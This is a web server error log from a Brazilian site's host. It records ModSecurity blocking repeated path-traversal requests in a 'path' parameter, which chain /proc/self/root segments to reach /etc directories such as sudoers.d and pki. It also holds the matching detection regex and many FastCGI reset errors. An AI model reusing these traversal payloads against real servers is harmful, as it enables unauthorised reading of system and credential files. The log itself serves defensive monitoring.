[Fri Mar 20 03:31:04.837367 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.243.128:39868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpqLninkcc-iUj5AorfgAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:31:14.133867 2026] [proxy_fcgi:error] [pid 8307:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43202] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:31:18.603476 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.243.128:55590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzptvHIg5MgXLBnicPJvgAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:31:26.104011 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:48142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpvhCii7xarUs8iHYxtQAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:31:30.246161 2026] [core:alert] [pid 26799:tid 140411590858496] [client 57.141.18.4:47932] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 03:31:33.833564 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:53378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpxfu8EFLIOrSqIpvstAAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:31:41.134040 2026] [proxy_fcgi:error] [pid 9818:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44076] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:31:41.718217 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:40832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpzfXLqtnMIWvjpaJmrAAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:31:57.095152 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:40846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzp3Pu8EFLIOrSqIpvsxQAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:32:04.924663 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.243.128:38918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzp5PXLqtnMIWvjpaJmuQAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:32:09.137932 2026] [proxy_fcgi:error] [pid 10189:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44942] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:32:13.478197 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.243.128:58214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzp7RCii7xarUs8iHYxxAAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:32:30.266346 2026] [:error] [pid 9818:tid 140411716749056] [client 74.7.243.128:59320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzp_l1pVZ5mVmJwsFP_LgAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:32:35.121887 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:45900] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:32:38.939607 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:38000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqBgkwaGbbGflqUZASnAAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:32:52.199079 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:45046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqFBCii7xarUs8iHYx3gAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:32:58.122426 2026] [proxy_fcgi:error] [pid 11642:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46612] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:32:59.149367 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.243.128:59960] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqG_HIg5MgXLBnicPJ9wAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:33:05.078583 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:34114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqIfqxLDW4GITHUkSv7QAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:33:22.138208 2026] [proxy_fcgi:error] [pid 7893:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47618] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:33:25.272183 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:55266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqNNa6ubjKNq_cu4acKwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:33:30.173813 2026] [proxy_fcgi:error] [pid 10189:tid 140411607643904] [client 179.188.53.243:51188] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.173847 2026] [proxy_fcgi:error] [pid 10189:tid 140411607643904] (104)Connection reset by peer: [client 179.188.53.243:51188] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.182391 2026] [proxy_fcgi:error] [pid 10189:tid 140411674785536] [client 179.188.53.243:48446] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.182419 2026] [proxy_fcgi:error] [pid 10189:tid 140411674785536] (104)Connection reset by peer: [client 179.188.53.243:48446] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.188290 2026] [proxy_fcgi:error] [pid 11167:tid 140411691570944] [client 57.141.18.23:50448] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.188324 2026] [proxy_fcgi:error] [pid 11167:tid 140411691570944] (104)Connection reset by peer: [client 57.141.18.23:50448] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.189773 2026] [proxy_fcgi:error] [pid 7235:tid 140411607643904] [client 179.188.53.243:51748] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.189813 2026] [proxy_fcgi:error] [pid 7235:tid 140411607643904] (104)Connection reset by peer: [client 179.188.53.243:51748] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.193493 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] [client 179.188.53.243:53584] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.193518 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (104)Connection reset by peer: [client 179.188.53.243:53584] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.196043 2026] [proxy_fcgi:error] [pid 31215:tid 140411716749056] [client 179.188.53.243:52332] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.196110 2026] [proxy_fcgi:error] [pid 31215:tid 140411716749056] (104)Connection reset by peer: [client 179.188.53.243:52332] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.198128 2026] [proxy_fcgi:error] [pid 21219:tid 140411691570944] [client 179.188.53.243:52940] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.198167 2026] [proxy_fcgi:error] [pid 21219:tid 140411691570944] (104)Connection reset by peer: [client 179.188.53.243:52940] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.198637 2026] [proxy_fcgi:error] [pid 9818:tid 140411741927168] [client 57.141.18.71:50292] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.198660 2026] [proxy_fcgi:error] [pid 9818:tid 140411741927168] (104)Connection reset by peer: [client 57.141.18.71:50292] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.200100 2026] [proxy_fcgi:error] [pid 7235:tid 140411674785536] [client 179.188.53.243:54854] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.200126 2026] [proxy_fcgi:error] [pid 7235:tid 140411674785536] (104)Connection reset by peer: [client 179.188.53.243:54854] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.201284 2026] [proxy_fcgi:error] [pid 31215:tid 140411607643904] [client 179.188.53.243:49346] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.201304 2026] [proxy_fcgi:error] [pid 31215:tid 140411607643904] (104)Connection reset by peer: [client 179.188.53.243:49346] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.204244 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] [client 179.188.53.243:54284] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.204272 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (104)Connection reset by peer: [client 179.188.53.243:54284] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.204343 2026] [proxy_fcgi:error] [pid 10189:tid 140411548894976] [client 179.188.53.243:50694] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.204369 2026] [proxy_fcgi:error] [pid 10189:tid 140411548894976] (104)Connection reset by peer: [client 179.188.53.243:50694] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.206337 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] [client 69.197.179.242:51918] AH01067: Failed to read FastCGI header, referer: https://bandeirantesbombas.com.br/wp-content/qq8c7500/index.php?id=462029
[Fri Mar 20 03:33:30.206371 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (104)Connection reset by peer: [client 69.197.179.242:51918] AH01075: Error dispatching request to : , referer: https://bandeirantesbombas.com.br/wp-content/qq8c7500/index.php?id=462029
[Fri Mar 20 03:33:30.209774 2026] [proxy_fcgi:error] [pid 15826:tid 140411582465792] [client 179.188.53.243:50108] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.209820 2026] [proxy_fcgi:error] [pid 15826:tid 140411582465792] (104)Connection reset by peer: [client 179.188.53.243:50108] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.210042 2026] [proxy_fcgi:error] [pid 11167:tid 140411741927168] [client 179.188.53.243:55434] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.210064 2026] [proxy_fcgi:error] [pid 11167:tid 140411741927168] (104)Connection reset by peer: [client 179.188.53.243:55434] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.215764 2026] [proxy_fcgi:error] [pid 10189:tid 140411565680384] [client 57.141.18.45:50398] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.215793 2026] [proxy_fcgi:error] [pid 10189:tid 140411565680384] (104)Connection reset by peer: [client 57.141.18.45:50398] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.215834 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] [client 57.141.18.46:50348] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.215850 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (104)Connection reset by peer: [client 57.141.18.46:50348] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.216039 2026] [proxy_fcgi:error] [pid 21219:tid 140411741927168] [client 57.141.18.101:50634] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.216080 2026] [proxy_fcgi:error] [pid 15826:tid 140411599251200] [client 57.141.18.83:50436] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.216099 2026] [proxy_fcgi:error] [pid 15826:tid 140411599251200] (104)Connection reset by peer: [client 57.141.18.83:50436] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.216167 2026] [proxy_fcgi:error] [pid 21219:tid 140411741927168] (104)Connection reset by peer: [client 57.141.18.101:50634] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.216327 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:37552] AH01067: Failed to read FastCGI header, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root
[Fri Mar 20 03:33:30.216344 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (104)Connection reset by peer: [client 74.7.243.128:37552] AH01075: Error dispatching request to : , referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root
[Fri Mar 20 03:33:30.216488 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] [client 57.141.18.57:50644] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.216499 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (104)Connection reset by peer: [client 57.141.18.57:50644] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.216637 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] [client 57.141.18.20:50366] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.216653 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (104)Connection reset by peer: [client 57.141.18.20:50366] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.216920 2026] [proxy_fcgi:error] [pid 21219:tid 140411582465792] [client 57.141.18.56:50488] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.216935 2026] [proxy_fcgi:error] [pid 21219:tid 140411582465792] (104)Connection reset by peer: [client 57.141.18.56:50488] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.217189 2026] [proxy_fcgi:error] [pid 7235:tid 140411658000128] [client 57.141.18.84:50364] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.217204 2026] [proxy_fcgi:error] [pid 7235:tid 140411658000128] (104)Connection reset by peer: [client 57.141.18.84:50364] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.217422 2026] [proxy_fcgi:error] [pid 11167:tid 140411666392832] [client 57.141.18.106:50470] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.217438 2026] [proxy_fcgi:error] [pid 11167:tid 140411666392832] (104)Connection reset by peer: [client 57.141.18.106:50470] AH01075: Error dispatching request to : 
